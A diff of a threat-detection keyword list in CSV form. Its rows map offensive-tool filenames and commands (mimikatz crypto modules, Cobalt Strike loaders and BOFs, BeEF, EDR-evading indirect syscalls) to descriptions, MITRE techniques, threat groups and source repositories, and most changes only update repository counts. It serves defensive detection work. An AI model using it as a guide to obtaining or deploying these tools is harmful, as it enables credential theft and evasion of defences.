-"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
 "*crypto_identifier*","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","116","26","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z"
 "*cryptvortex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*cs2modrewrite.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z"
@@ -8954,18 +9102,18 @@
 "*CSharpNamedPipeLoader*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
 "*csload.net/*/muma.*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z"
 "*csOnvps*teamserver*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
-"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3108","1130","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z"
-"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3108","1130","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z"
+"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z"
+"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z"
 "*csprecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
-"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
-"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
 "*cs-token-vault.git*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
-"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
-"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
